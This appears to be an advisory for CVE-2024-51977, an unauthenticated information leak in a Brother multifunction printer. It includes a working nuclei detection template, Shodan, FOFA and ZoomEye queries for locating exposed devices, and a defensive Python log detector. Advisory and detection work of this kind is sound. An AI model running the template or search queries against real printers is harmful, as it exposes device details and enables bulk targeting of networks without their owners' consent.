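Brother MFC-L9570CDW Information Disclosure Vulnerability

Vulnerability Information

Vulnerability name: Brother MFC-L9570CDW Information Disclosure Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-51977

Vulnerability type: Information disclosure

Severity: Medium

Description: The Brother MFC-L9570CDW is a multifunction printer widely used in enterprise and home environments, providing printing, scanning, copying and other functions. The device can be accessed over the network through its HTTP service (TCP port 80), HTTPS service (TCP port 443) or IPP service (TCP port 631).

This is an information disclosure vulnerability. Its technical root cause is that the device does not properly authenticate requests for the path /etc/mnt_info.csv. By sending a GET request to that path, an attacker can obtain sensitive device information without any authentication, including the device model, firmware version, IP address and serial number. The information is returned as a comma-separated values (CSV) table.

The security risk is that an attacker can use the leaked information for further attacks, such as exploiting vulnerabilities specific to the model and firmware version, or social-engineering attacks such as phishing. Because the vulnerability can be exploited without authentication and can be scanned for and exploited in bulk with automated tools, it poses a medium-level security threat to affected devices.

Vendor: Brother

Product: Brother MFC-L9570CDW

Search syntax: html:"MFC-L9570CDW"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/248975b0dd50823c64c0718b4d250bc85788707a/http%2Fcves%2F2024%2FCVE-2024-51977.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details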


```yaml
id: CVE-2024-51977

info:
  name: Brother MFC-L9570CDW - Information Disclosure
  author: DhiyaneshDK,iamnoooob,darses
  severity: medium
  description: |
    An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
  reference:
    - https://github.com/sfewer-r7/BrotherVulnerabilities/blob/main/CVE-2024-51977.rb
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MFC-L9570CDW"
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,mfc,printer,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/mnt_info.csv"

    matchers-condition: and
    matchers:
      # Both CSV column headers must be present in the response body
      - type: word
        part: body
        words:
          - '"Model Name"'
          - '"IP Address"'
        condition: and

      # Response status and content type checks
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "text/comma-separated-values")'
```
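
For defenders, the following added example (not part of the original page or the nuclei template) flags successful requests for /etc/mnt_info.csv in network sensor or proxy logs and highlights sources that pulled the file from several printers, the bulk-scanning pattern the description warns about. The log layout, the IP addresses and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

LEAK_PATH = "/etc/mnt_info.csv"  # path named in the advisory

# Assumed log layout (constructed for this example, origin-form URIs):
#   <src_ip> <dst_ip> "<METHOD> <uri> HTTP/x" <status> <bytes>
LINE_RE = re.compile(
    r'^(?P<src>\S+) (?P<dst>\S+) "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample log lines, not taken from a real device or network
SAMPLE_LOG = """\
10.0.5.23 10.0.9.40 "GET /etc/mnt_info.csv HTTP/1.1" 200 512
10.0.5.23 10.0.9.41 "GET /etc//mnt_info.csv?x=1 HTTP/1.1" 200 498
10.0.5.23 10.0.9.42 "GET /etc/mnt_info.csv HTTP/1.1" 404 0
10.0.7.8 10.0.9.40 "GET /general/status.html HTTP/1.1" 200 8042
10.0.7.9 10.0.9.40 "GET /etc/%6dnt_info.csv HTTP/1.1" 200 512
garbage line that does not parse
"""

def normalize(uri):
    """Drop the query string, decode percent-escapes, collapse // and dot segments."""
    path = unquote(uri.split("?", 1)[0])
    return normpath("/" + path.lstrip("/"))

def find_leak_requests(log_text):
    """Return {src_ip: sorted printers that answered 200 on LEAK_PATH}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue  # unparseable line or a method the advisory does not describe
        if normalize(m["uri"]) == LEAK_PATH and m["status"] == "200":
            hits[m["src"]].add(m["dst"])
    return {src: sorted(dsts) for src, dsts in hits.items()}

def sweeping_sources(hits, min_targets=2):
    """Sources that retrieved the file from several devices (likely bulk scan)."""
    return sorted(s for s, d in hits.items() if len(d) >= min_targets)

if __name__ == "__main__":
    hits = find_leak_requests(SAMPLE_LOG)
    print("successful retrievals:", hits)
    print("multi-device sources:", sweeping_sources(hits))
```

Matching on the normalized path catches percent-encoded and double-slash variants that a plain string match on the raw URI would miss.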